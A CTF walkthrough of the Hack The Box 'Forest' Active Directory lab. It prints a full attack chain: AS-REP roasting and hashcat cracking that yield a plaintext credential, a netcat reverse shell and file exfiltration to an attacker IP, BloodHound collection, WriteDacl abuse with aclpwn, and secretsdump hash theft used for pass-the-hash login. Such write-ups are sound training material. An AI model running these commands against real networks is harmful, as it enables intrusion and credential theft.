CTF WriteupsHackthebox Writeups

Hackthebox Forest Walkthrough

hackthebox writeups

In this article you well learn the following:

  • Scanning targets using nmap.
  • Enumerate windows machine
  • asreproast attack on valid users
  • Cracking krb5asrep hashes with hashcat
  • Enumerate active directory vis sharphound
  • Show result in bloodhound tool
  • Attacking WriteDacl
  • Steal users hashes ( LM:NT )

Nmap Scanning:

[box type=”shadow” align=”” class=”” width=””]

Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161

[/box]

Enumeration:
– I started enumerating users using enum4linux :
enum4linux -a 10.10.10.161
– Then enumerate users using rpcclient :

After enumurating the users, and since kerberos port open, I run GetNPUsers.py script from
impackets suite :
python GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile users.txt -outputfile hashes2.txt -format hashcat

I got the hashed password for user svc-alfresco :

To crack this hashed password I used hashcat as following :

hashcat -m 18200 –force -a 0 hashes2.txt rockyou.txt

And I have now valid credentials : svc-alfresco:s3rvice

I run smbmap to see shared folder permissions , nothing interesting.

Then, I connected to the server using evil-winrm with these valid credentials and got user flag:

I started with enumerating active directory, after I got reverse shell and execute powershell.exe

python -m SimpleHTTPServer 80

Invoke-WebRequest -Uri http://10.10.14.42/nc64.exe -OutFile “C:\m4rv3l\nc64.exe”
./nc64.exe 10.10.14.42 9091 -e powershell.exe

Installing SharpHound

Invoke-WebRequest -Uri http://10.10.14.42/SharpHound.ps1 -OutFile “C:\m4rv3l\SharpHound.ps1”

Execute SharpHound:

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -JSONFolder “c:\experiments\bloodhound”

Moving it via nc64:

nc -lvp 9092 > 20200321052509_BloodHound.zip

.\nc64.exe 10.10.14.42 9092 < 20200321052509_BloodHound.zip

NOTE: Run cmd.exe to do that

After getting .zip file from box , I run bloodhound tool and searching for path to administrator:

BloodHound Result Shows Svc-Alfresco can WriteDacl to HTB.local that Contains [email protected]

Good resource to understand attack:
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/

Tool :

pip install aclpwn
aclpwn -f svc-alfresco -ft user -d htb.local -s 10.10.10.161
choosing path 0

python secretsdump.py htb.local/svc-alfresco:[email protected]

Then I connect to administrator with nthash via evil-winrm tool , and got root.txt

That’s all folks 😀

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
Close